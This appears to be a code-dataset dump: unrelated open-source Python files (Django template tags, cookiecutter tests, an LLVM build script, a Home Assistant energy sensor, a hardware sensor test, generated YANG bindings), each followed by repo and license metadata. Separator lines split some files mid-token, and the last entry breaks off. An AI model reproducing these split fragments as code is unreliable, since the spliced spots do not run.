raise TemplateSyntaxError("Malformed arguments to %s tag" % name)
name, value = match.groups()
if name:
kwargs[name] = parser.compile_filter(value)
else:
args.append(parser.compile_filter(value))
return args, kwargs
def fetch_arg(name, arg, bits, consume=True):
try:
pivot = bits.index(arg)
try:
value = bits[pivot + 1]
except IndexError:
raise TemplateSyntaxError("'%s' arguments must include "
"a variable name after '%s'" %
(name, arg))
else:
if consume:
del bits[pivot:pivot + 2]
return value, pivot, bits
except ValueError:
return None, None, bits
@register.tag
def host_url(parser, token):
"""
    Simple tag to reverse the URL including a host.
{% host_url 'view-name' host 'host-name' %}
{% host_url 'view-name' host 'host-name' 'spam' %}
{% host_url 'view-name' host 'host-name' scheme 'https' %}
{% host_url 'view-name' host 'host-name' as url_on_host_variable %}
{% host_url 'view-name' varg1=vvalue1 host 'host-name' 'spam' 'hvalue1' %}
{% host_url 'view-name' vvalue2 host 'host-name' 'spam' harg2=hvalue2 %}
"""
bits = token.split_contents()
name = bits[0]
if len(bits) < 2:
raise TemplateSyntaxError("'%s' takes at least one argument"
" (path to a view)" % name)
view_name = parser.compile_filter(bits[1])
asvar, pivot, bits = fetch_arg(name, 'as', bits[1:]) # Strip off viewname
scheme, pivot, bits = fetch_arg(name, 'scheme', bits)
if scheme:
scheme = parser.compile_filter(scheme)
port, pivot, bits = fetch_arg(name, 'port', bits)
if port:
port = parser.compile_filter(port)
host, pivot, bits = fetch_arg(name, 'host', bits, consume=False)
if host:
host = parser.compile_filter(host)
view_args, view_kwargs = parse_params(name, parser, bits[1:pivot])
host_args, host_kwargs = parse_params(name, parser, bits[pivot + 2:])
else:
# No host was given so use the default host
host = settings.DEFAULT_HOST
view_args, view_kwargs = parse_params(name, parser, bits[1:])
host_args, host_kwargs = (), {}
return HostURLNode(view_name=view_name, args=view_args, kwargs=view_kwargs,
asvar=asvar, host=host, host_args=host_args,
host_kwargs=host_kwargs, scheme=scheme, port=port)
|
luzfcb/cookiecutter
|
tests/replay/test_replay.py
|
Python
|
bsd-3-clause
| 2,207
| 0
|
# -*- coding: utf-8 -*-
"""test_replay."""
import os
import pytest
from cookiecutter import replay, main, exceptions
def test_get_replay_file_name():
"""Make sure that replay.get_file_name generates a valid json file path."""
exp_replay_file_name = os.path.join('foo', 'bar.json')
assert replay.get_file_name('foo', 'bar') == exp_replay_file_name
@pytest.mark.parametrize(
'invalid_kwargs', ({'no_input': True},
{'extra_context': {}},
{'no_input': True, 'extra_context': {}},)
)
def test_raise_on_invalid_mode(invalid_kwargs):
"""Test `cookiecutter` raise exception on unacceptable `replay` request."""
with pytest.raises(exceptions.InvalidModeException):
main.cookiecutter('foo', replay=True, **invalid_kwargs)
def test_main_does_not_invoke_dump_but_load(mocker):
"""Test `cookiecutter` calling correct functions o
|
n `replay`."""
mock_
|
prompt = mocker.patch('cookiecutter.main.prompt_for_config')
mock_gen_context = mocker.patch('cookiecutter.main.generate_context')
mock_gen_files = mocker.patch('cookiecutter.main.generate_files')
mock_replay_dump = mocker.patch('cookiecutter.main.dump')
mock_replay_load = mocker.patch('cookiecutter.main.load')
main.cookiecutter('tests/fake-repo-tmpl/', replay=True)
assert not mock_prompt.called
assert not mock_gen_context.called
assert not mock_replay_dump.called
assert mock_replay_load.called
assert mock_gen_files.called
def test_main_does_not_invoke_load_but_dump(mocker):
"""Test `cookiecutter` calling correct functions on non-replay launch."""
mock_prompt = mocker.patch('cookiecutter.main.prompt_for_config')
mock_gen_context = mocker.patch('cookiecutter.main.generate_context')
mock_gen_files = mocker.patch('cookiecutter.main.generate_files')
mock_replay_dump = mocker.patch('cookiecutter.main.dump')
mock_replay_load = mocker.patch('cookiecutter.main.load')
main.cookiecutter('tests/fake-repo-tmpl/', replay=False)
assert mock_prompt.called
assert mock_gen_context.called
assert mock_replay_dump.called
assert not mock_replay_load.called
assert mock_gen_files.called
|
a5kin/hecate
|
examples/__init__.py
|
Python
|
mit
| 107
| 0
|
"""
A collection of Xentica models and experiments.
Intended to illustrate how to use the framework.
"""
|
tykkz/hasherapp
|
algorithm.py
|
Python
|
mit
| 1,194
| 0.002513
|
import hashlib
def hash_list():
return str(hashlib.algorithms_guaranteed)
def hash_text(algorithm_array, text, pass_count):
result_dict = {}
# Type checking
if type(pass_count) is not int:
return [False, {"error": "Pass count should be of 'integer' type."}]
elif type(text) is not str:
return [False, {"error": "Text should be of 'string' type."}]
elif type(algorithm_array) is not list:
return [False, {"error": "Algorithm
|
list should be of 'list' type."}]
# Bounds checking
avail_alg_set = set(algorithm_array) & set(hashlib.algorithms_guaranteed)
if pass_count > 1000000 or pass_count <= 0:
return [False, {"error": "Pass count should be larger than 0 and smaller than 1000000."}]
elif len(avail_alg_set) == 0:
return [False, {"error": "None of these hash algorithms are available."}]
# There is no error case; do the hash computations for every function
for function in avail_alg_set:
hash_val = text
for _ in range(pass_count):
hash_val = getattr(hashlib, function)(hash_val.encode()).hexdigest()
result_dict[function] = hash_val
return [True, result_dict]
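# Usage sketch: two passes of sha256 and md5 over a sample string.
if __name__ == "__main__":
    ok, result = hash_text(["sha256", "md5"], "secret", 2)
    if ok:
        for algorithm in sorted(result):
            print(algorithm + ": " + result[algorithm])
    else:
        print(result["error"])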
|
ONLYOFFICE/core
|
Test/Applications/StandardTester/tester/scripts/generate.py
|
Python
|
agpl-3.0
| 134
| 0.014925
|
#!/usr/bin/env python
import tester
tester.make(["--input='./result/standard'", "--output='./result/out'", "--standard", "--cores=1"])
|
prymitive/bootstrap-breadcrumbs
|
django_bootstrap_breadcrumbs/templatetags/django_bootstrap_breadcrumbs.py
|
Python
|
mit
| 7,292
| 0
|
# -*- coding: utf-8 -*-
"""
:copyright: Copyright 2013 by Łukasz Mierzwa
:contact: l.mierzwa@gmail.com
"""
from __future__ import unicode_literals
import logging
from inspect import ismethod
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.encoding import smart_text
from django.db.models import Model
from django.conf import settings
from django import template, VERSION
from six import wraps
if VERSION >= (3, 0):
from django.utils.translation import gettext as _
else:
from django.utils.translation import ugettext as _
if VERSION >= (2, 0):
from django.urls import (reverse, resolve, NoReverseMatch, Resolver404)
else:
from django.core.urlresolvers import (reverse, resolve, NoReverseMatch,
Resolver404)
logger = logging.getLogger(__name__)
register = template.Library()
CONTEXT_KEY = 'DJANGO_BREADCRUMB_LINKS'
def log_request_not_found():
if VERSION < (1, 8): # pragma: nocover
logger.error("request object not found in context! Check if "
"'django.core.context_processors.request' is in "
"TEMPLATE_CONTEXT_PROCESSORS")
else: # pragma: nocover
logger.error("request object not found in context! Check if "
"'django.template.context_processors.request' is in the "
"'context_processors' option of your template settings.")
def requires_request(func):
@wraps(func)
def wrapped(context, *args, **kwargs):
if 'request' in context:
return func(context, *args, **kwargs)
log_request_not_found()
return ''
return wrapped
@requires_request
def append_breadcrumb(context, label, viewname, args, kwargs):
context['request'].META[CONTEXT_KEY] = context['request'].META.get(
CONTEXT_KEY, []) + [(label, viewname, args, kwargs)]
@register.simple_tag(takes_context=True)
def breadcrumb(context, label, viewname, *args, **kwargs):
"""
Add link to list of breadcrumbs, usage:
    {% load django_bootstrap_breadcrumbs %}
{% breadcrumb "Home" "index" %}
Remember to use it inside {% block %} with {{ block.super }} to get all
parent breadcrumbs.
:param label: Breadcrumb link label.
:param viewname: Name of the view to link this breadcrumb to, or Model
instance with implemented get_absolute_url().
:param args: Any arguments to view function.
"""
append_breadcrumb(context, _(escape(label)), viewname, args, kwargs)
return ''
@register.simple_tag(takes_context=True)
def breadcrumb_safe(context, label, viewname, *args, **kwargs):
"""
Same as breadcrumb but label is not escaped.
"""
append_breadcrumb(context, _(label), viewname, args, kwargs)
return ''
@register.simple_tag(takes_context=True)
def breadcrumb_raw(context, label, viewname, *args, **kwargs):
"""
Same as breadcrumb but label is not translated.
"""
append_breadcrumb(context, escape(label), viewname, args, kwargs)
return ''
@register.simple_tag(takes_context=True)
def breadcrumb_raw_safe(context, label, viewname, *args, **kwargs):
"""
Same as breadcrumb but label is not escaped and translated.
"""
append_breadcrumb(context, label, viewname, args, kwargs)
return ''
@register.simple_tag(takes_context=True)
@requires_request
def render_breadcrumbs(context, *args):
"""
Render breadcrumbs html using bootstrap css classes.
"""
try:
template_path = args[0]
except IndexError:
template_path = getattr(settings, 'BREADCRUMBS_TEMPLATE',
'django_bootstrap_breadcrumbs/bootstrap2.html')
links = []
for (label, viewname, view_args, view_kwargs) in context[
'request'].META.get(CONTEXT_KEY, []):
if isinstance(viewname, Model) and hasattr(
viewname, 'get_absolute_url') and ismethod(
viewname.get_absolute_url):
url = viewname.get_absolute_url(*view_args, **view_kwargs)
else:
try:
try:
# 'resolver_match' introduced in Django 1.5
current_app = context['request'].resolver_match.namespace
except AttributeError:
try:
resolver_match = resolve(context['request'].path)
current_app = resolver_match.namespace
except Resolver404:
current_app = None
url = reverse(viewname=viewname, args=view_args,
kwargs=view_kwargs, current_app=current_app)
except NoReverseMatch:
url = viewname
links.append((url, smart_text(label) if label else label))
if not links:
return ''
if VERSION > (1, 8): # pragma: nocover
# RequestContext is deprecated in recent django
# https://docs.djangoproject.com/en/1.10/ref/templates/upgrading/
context = context.flatten()
context['breadcrumbs'] = links
context['breadcrumbs_total'] = len(links)
return mark_safe(template.loader.render_to_string(template_path, context))
class BreadcrumbNode(template.Node):
def __init__(self, nodelist, viewname, args):
self.nodelist = nodelist
self.viewname = viewname
self.args = list(args)
self.kwargs = {}
for arg in args:
if '=' in arg:
name = arg.split('=')[0]
val = '='.join(arg.split('=')[1:])
self.kwargs[name] = val
self.args.remove(arg)
def render(self, context):
if 'request' not in context:
log_request_not_found()
return ''
label = self.nodelist.render(context)
try:
viewname = template.Variable(self.viewname).resolve(context)
except template.VariableDoesNotExist:
viewname = self.viewname
args = self.parse_args(context)
kwargs = self.parse_kwargs(context)
append_breadcrumb(context, label, viewname, args, kwargs)
return ''
def parse_args(self, context):
args = []
for arg in self.args:
try:
value = template.Variable(arg).resolve(context)
except template.VariableDoesNotExist:
value = arg
args.append(value)
return args
def parse_kwargs(self, context):
kwargs = {}
for name, val in self.kwargs.items():
try:
value = template.Variable(val).resolve(context)
except template.VariableDoesNotExist:
value = val
kwargs[name] = value
return kwargs
@register.tag
def breadcrumb_for(parser, token):
bits = list(token.split_contents())
end_tag = 'end' + bits[0]
nodelist = parser.parse((end_tag,))
parser.delete_first_token()
return BreadcrumbNode(nodelist, bits[1], bits[2:])
@register.simple_tag(takes_context=True)
@requires_request
def clear_breadcrumbs(context, *args):
"""
Removes all currently added breadcrumbs.
"""
context['request'].META.pop(CONTEXT_KEY, None)
return ''
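# Template usage sketch (comments only; assumes the request context processor
# is enabled; the view names below are hypothetical):
#
#   {% load django_bootstrap_breadcrumbs %}
#   {% block breadcrumbs %}
#       {% breadcrumb "Home" "index" %}
#       {% breadcrumb "Users" "users_list" %}
#   {% endblock %}
#   ...
#   {% render_breadcrumbs %}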
|
OpenISA/riscv-sbt
|
scripts/auto/llvm.py
|
Python
|
mit
| 3,402
| 0.004409
|
#!/usr/bin/env python3
from auto.config import DIR, RV32_LINUX
from auto.gnu_toolchain import GnuToolchain
from auto.utils import cat, cd, path, shell
import auto.pkg
import os
class LLVM(auto.pkg.Package):
def _prepare(self):
link = path(DIR.submodules, "llvm/tools/clang")
if not os.path.exists(link):
shell("ln -sf {}/clang {}".format(DIR.submodules, link))
# Apply patches
llvm_dir = path(DIR.submodules, "llvm")
clang_dir = path(DIR.submodules, "clang")
with cd(DIR.patches):
llvm_patches = shell("ls 0?-relax-*", save_out=True).strip().split()
clang_patches = shell("ls 0?-clang-*", save_out=True).strip().split()
if not os.path.exists(path(llvm_dir, ".patched")):
with cd(llvm_dir):
for p in llvm_patches:
shell("patch -p0 < {}/{}".format(DIR.patches, p))
shell("touch .patched")
if not os.path.exists(path(clang_dir, ".patched")):
with cd(clang_dir):
for p in clang_patches:
shell("patch -p0 < {}/{}".format(DIR.patches, p))
shell("touch .patched")
def _build(self):
shell("cmake --build {} -- {}".format(self.build_dir, self.make_opts))
def _install(self):
shell("cmake --build {} --target install".format(self.build_dir))
def _postinstall(self):
srcdir = path(self.build_dir, "lib/Target/RISCV")
dstdir = path(self.prefix, "include/llvm/Target/RISCV")
shell("mkdir -p " + dstdir)
for f in ["RISCVGenInstrInfo.inc", "RISCVGenRegisterInfo.inc"]:
shell("cp {0}/{2} {1}/{2}".format(srcdir, dstdir, f))
def _pkgs():
# lowrisc llvm
name = "llvm"
prefix = DIR.toolchain_debug
build_dir = path(DIR.build, "llvm")
    def configure(clang_ver, prefix, gnu_tc_prefix):
return cat(
"cmake",
"-G Ninja",
            '-DLLVM_TARGETS_TO_BUILD="ARM;X86"',
"-DCMAKE_BUILD_TYPE=Debug",
"-DBUILD_SHARED_LIBS=True",
"-DLLVM_USE_SPLIT_DWARF=True",
"-DLLVM_OPTIMIZED_TABLEGEN=True",
"-DLLVM_BUILD_TESTS=True",
"-DCMAKE_C_COMPILER=/usr/bin/clang-{0}",
"-DCMAKE_CXX_COMPILER=/usr/bin/clang++-{0}",
"-DGCC_INSTALL_PREFIX={2}",
"-DLLVM_DEFAULT_TARGET_TRIPLE=" + RV32_LINUX.triple,
'-DLLVM_EXPERIMENTAL_TARGETS_TO_BUILD="RISCV"',
"-DCMAKE_INSTALL_PREFIX={1}",
path(DIR.submodules, "llvm")).format(
clang_ver, prefix, gnu_tc_prefix)
makefile = "build.ninja"
out = "bin/clang"
toolchain = "bin/clang"
deps = ["riscv-gnu-toolchain-newlib"]
pkg0 = LLVM(name, prefix, build_dir,
makefile=makefile,
configure=configure("3.9", prefix, GnuToolchain.PREFIX),
build_out=out,
toolchain=toolchain,
deps=deps)
name = "llvm-gcc7"
prefix = path(DIR.toolchain_debug, "gcc7")
build_dir = path(DIR.build, "llvm-gcc7")
pkg1 = LLVM(name, prefix, build_dir,
makefile=makefile,
configure=configure("6.0", prefix, GnuToolchain.PREFIX_GCC7),
build_out=out,
toolchain=toolchain,
deps=deps)
return [pkg0, pkg1]
auto.pkg.Package.pkgs.extend(_pkgs())
|
rohitranjan1991/home-assistant
|
homeassistant/components/ovo_energy/sensor.py
|
Python
|
mit
| 6,463
| 0.000928
|
"""Support for OVO Energy sensors."""
from __future__ import annotations
from collections.abc import Callable
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Final
from ovoenergy import OVODailyUsage
from ovoenergy.ovoenergy import OVOEnergy
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntity,
SensorEntityDescription,
SensorStateClass,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import ENERGY_KILO_WATT_HOUR
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from homeassistant.util import dt as dt_util
from . import OVOEnergyDeviceEntity
from .const import DATA_CLIENT, DATA_COORDINATOR, DOMAIN
SCAN_INTERVAL = timedelta(seconds=300)
PARALLEL_UPDATES = 4
KEY_LAST_ELECTRICITY_COST: Final = "last_electricity_cost"
KEY_LAST_GAS_COST: Final = "last_gas_cost"
@dataclass
class OVOEnergySensorEntityDescription(SensorEntityDescription):
"""Class describing System Bridge sensor entities."""
value: Callable[[OVODailyUsage], StateType | datetime] = round
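# `round` is only a placeholder default; every description below supplies
# its own `value` extractor.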
SENSOR_TYPES_ELECTRICITY: tuple[OVOEnergySensorEntityDescription, ...] = (
OVOEnergySensorEntityDescription(
key="last_electricity_reading",
name="OVO Last Electricity Reading",
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
native_unit_of_measurement=ENERGY_KILO_WATT_HOUR,
value=lambda usage: usage.electricity[-1].consumption,
),
OVOEnergySensorEntityDescription(
key=KEY_LAST_ELECTRICITY_COST,
name="OVO Last Electricity Cost",
device_class=SensorDeviceClass.MONETARY,
state_class=SensorStateClass.TOTAL_INCREASING,
value=lambda usage: usage.electricity[-1].cost.amount
if usage.electricity[-1].cost is not None
else None,
),
OVOEnergySensorEntityDescription(
key="last_electricity_start_time",
name="OVO Last Electricity Start Time",
entity_registry_enabled_default=False,
device_class=SensorDeviceClass.TIMESTAMP,
value=lambda usage: dt_util.as_utc(usage.electricity[-1].interval.start),
),
OVOEnergySensorEntityDescription(
key="last_electricity_end_time",
name="OVO Last Electricity End Time",
entity_registry_enabled_default=False,
device_class=SensorDeviceClass.TIMESTAMP,
value=lambda usage: dt_util.as_utc(usage.electricity[-1].interval.end),
),
)
SENSOR_TYPES_GAS: tuple[OVOEnergySensorEntityDescription, ...] = (
OVOEnergySensorEntityDescription(
key="last_gas_reading",
name="OVO Last Gas Reading",
device_class=SensorDeviceClass.ENERGY,
state_class=SensorStateClass.TOTAL_INCREASING,
native_unit_of_measurement=ENERGY_KILO_WATT_HOUR,
icon="mdi:gas-cylinder",
value=lambda usage: usage.gas[-1].consumption,
),
OVOEnergySensorEntityDescription(
key=KEY_LAST_GAS_COST,
name="OVO Last Gas Cost",
device_class=SensorDeviceClass.MONETARY,
state_class=SensorStateClass.TOTAL_INCREASING,
icon="mdi:cash-multiple",
value=lambda usage: usage.gas[-1].cost.amount
if usage.gas[-1].cost is not None
else None,
),
OVOEnergySensorEntityDescription(
key="last_gas_start_time",
name="OVO Last Gas Start Time",
entity_registry_enabled_default=False,
device_class=SensorDeviceClass.TIMESTAMP,
value=lambda usage: dt_util.as_utc(usage.gas[-1].interval.start),
),
OVOEnergySensorEntityDescription(
key="last_gas_end_time",
name="OVO Last Gas End Time",
entity_registry_enabled_default=False,
device_class=SensorDeviceClass.TIMESTAMP,
value=lambda usage: dt_util.as_utc(usage.gas[-1].interval.end),
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up OVO Energy sensor based on a config entry."""
coordinator: DataUpdateCoordinator = hass.data[DOMAIN][entry.entry_id][
DATA_COORDINATOR
]
client: OVOEnergy = hass.data[DOMAIN][entry.entry_id][DATA_CLIENT]
entities = []
if coordinator.data:
if coordinator.data.electricity:
for description in SENSOR_TYPES_ELECTRICITY:
if (
description.key == KEY_LAST_ELECTRICITY_COST
and coordinator.data.electricity[-1] is not None
and coordinator.data.electricity[-1].cost is not None
):
description.native_unit_of_measurement = (
coordinator.data.electricity[-1].cost.currency_unit
)
entities.append(OVOEnergySensor(coordinator, description, client))
if coordinator.data.gas:
for description in SENSOR_TYPES_GAS:
if (
description.key == KEY_LAST_GAS_COST
and coordinator.data.gas[-1] is not None
and coordinator.data.gas[-1].cost is not None
):
description.native_unit_of_measurement = coordinator.data.gas[
-1
].cost.currency_unit
entities.append(OVOEnergySensor(coordinator, description, client))
async_add_entities(entities, True)
class OVOEnergySensor(OVOEnergyDeviceEntity, SensorEntity):
"""Define a OVO Energy sensor."""
coordinator: DataUpdateCoordinator
entity_description: OVOEnergySensorEntityDescription
def __init__(
self,
coordinator: DataUpdateCoordinator,
description: OVOEnergySensorEntityDescription,
client: OVOEnergy,
) -> None:
"""Initialize."""
super().__init__(
coordinator,
client,
)
self._attr_unique_id = f"{DOMAIN}_{client.account_id}_{description.key}"
self.entity_description = description
@property
def native_value(self) -> StateType | datetime:
"""Return the state."""
usage: OVODailyUsage = self.coordinator.data
return self.entity_description.value(usage)
|
daweiwu/meta-iotqa-1
|
lib/oeqa/runtime/sensor/test_gyro_lsm330dlc.py
|
Python
|
mit
| 2,634
| 0.006834
|
"""
@file test_gyro_lsm330dlc.py
"""
##
# @addtogroup soletta sensor
# @brief This is sensor test based on soletta app
# @brief test sensor lsm330dlc on Galileo/MinnowMax/Edison
##
import os
import time
from oeqa.utils.helper import shell_cmd
from oeqa.oetest import oeRuntimeTest
from EnvirSetup import EnvirSetup
from oeqa.utils.decorators import tag
@tag(TestType="FVT", FeatureID="IOTOS-757")
class TestGyroLSM330DLC(oeRuntimeTest):
"""
@class TestGyroLSM330DLC
"""
def setUp(self):
'''Generate fbp file on target
@fn setUp
@param self
@return'''
print 'start!\n'
#connect sensor and DUT through board
#shell_cmd("sudo python "+ os.path.dirname(__file__) + "/Connector.py lsm330dlc")
envir = EnvirSetup(self.target)
envir.envirSetup("lsm330dlc","gyro")
def tearDown(self):
'''unload lsm330dlc driver
@fn tearDown
@param self
@return'''
(status, output) = self.target.run("cat /sys/devices/virtual/dmi/id/board_name")
if "Minnow" in outp
|
ut:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x6b >i2c-1/delete_device")
if "Galileo" in output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x6b >i2c-0/delete_device")
if "BODEGA" in
|
output:
(status, output) = self.target.run(
"cd /sys/bus/i2c/devices; \
echo 0x6b >i2c-6/delete_device")
def test_Gyro_LSM330DLC(self):
'''Execute the test app and verify sensor data
@fn test_Gyro_LSM330DLC
@param self
@return'''
print 'start reading data!'
(status, output) = self.target.run(
"chmod 777 /opt/apps/test_gyro_lsm330dlc.fbp")
(status, output) = self.target.run(
"cd /opt/apps; ./test_gyro_lsm330dlc.fbp >re.log")
error = output
(status, output) = self.target.run(
"cp /opt/apps/re.log /home/root/lsm330dlc.log")
(status, output) = self.target.run("cat /opt/apps/re.log|grep direction-vector")
print output + "\n"
self.assertEqual(status, 0, msg="Error messages: %s" % error)
#make sure sensor data is valid
(status, output) = self.target.run("cat /opt/apps/re.log|grep '0.000000, 0.000000, 0.000000'")
self.assertEqual(status, 1, msg="Error messages: %s" % output)
|
napalm-automation/napalm-yang
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/__init__.py
|
Python
|
apache-2.0
| 19,446
| 0.001337
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
from . import types_of_service
class as_external_lsa(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Contents of the AS External LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__state", "__types_of_service")
_yang_name = "as-external-lsa"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
self.__types_of_service = YANGDynClass(
base=types_of_service.types_of_service,
is_container="container",
yang_name="types-of-service",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"as-external-lsa",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container)
YANG Description: State parameters for the AS external LSA
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters for the AS external LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
def _get_types_of_service(self):
"""
Getter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container)
YANG Description: Breakdown of External LSA contents specifying multiple
TOS values
"""
return self.__types_of_service
def _set_types_of_service(self, v, load=False):
"""
Setter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_types_of_service is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_types_of_service() directly.
YANG Description: Breakdown of External LSA contents specifying multiple
TOS values
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=types_of_service.types_of_service,
is_container="container",
yang_name="types-of-service",
parent=self,
path_helper=self._path_helper,
extmethods=self
|
warner83/micropython
|
tests/bytecode/mp-tests/class5.py
|
Python
|
mit
| 96
| 0.03125
|
class A(B):
pass
class A(object):
pass
class A(x.y()):
pass
class A(B, C):
pass
|
ZeroCater/Eyrie
|
eyrie/wsgi.py
|
Python
|
mit
| 478
| 0
|
"""
WSGI config for eyrie project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
from whitenoise.django import DjangoWhiteNoise
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eyrie.settings")
application = get_wsgi_application()
application = DjangoWhiteNoise(application)
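# Wrapping the WSGI callable lets WhiteNoise serve the collected static
# files itself, with no separate static-file server configuration.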
|
lodevil/pyparser
|
pyparser/symbol.py
|
Python
|
apache-2.0
| 72
| 0
|
class Symbol(object):
def __init__(self, num, name):
pass
|
ade25/ade25.assetmanager
|
ade25/assetmanager/tests/test_setup.py
|
Python
|
mit
| 1,209
| 0.002481
|
# -*- coding: utf-8 -*-
"""Setup/installation tests for this package."""
from ade25.assetmanager.testing import IntegrationTestCase
from plone import api
class TestInstall(IntegrationTestCase):
"""Test installation of ade25.assetmanager into Plone."""
def setUp(self):
"""Custom shared utility setup for tests."""
self.portal = self.layer['portal']
self.installer = api.portal.get_tool('portal_quickinstaller')
def test_product_installed(self):
"""Test if ade25.assetmanager is installed with portal_quickinstaller."""
self.assertTrue(self.installer.isProductInstalled('ade25.assetmanager'))
def test_uninstall(self):
"""Test if ade25.assetmanager is cleanly uninst
|
alled."""
self.installer.uninstallProducts(['ade25.assetmanager'])
self.assertFalse(self.installer.isProductInstalled('ade25.assetmanager'))
# browserlayer.xml
def test_browserlayer(self):
"""Test that IAde25AssetmanagerLayer is registered."""
from ade25.assetmanager.interfaces import IAde25AssetmanagerLayer
from plone.browserlayer import utils
self.failUnless(IAde25AssetmanagerLayer in utils.registered_layers())
|
kcthrn/clontris
|
clontris/meta.py
|
Python
|
gpl-3.0
| 1,028
| 0
|
# Copyright (C) 2017 Kacy Thorne
#
# This file is part of Clontris.
#
# Clontris is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Clontris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""This module containts project metadata.
If using setuptools, then within setup.py put::
meta = {}
with open('clontris/meta.py') as f:
exec(f.read(), meta)
Then access this module's attributes like this::
version = meta['version']
"""
package_name = 'clontris'
project_name = 'Clontris'
version = '0.1.0-dev'
|
ManrajGrover/CodeSprint_India_2014
|
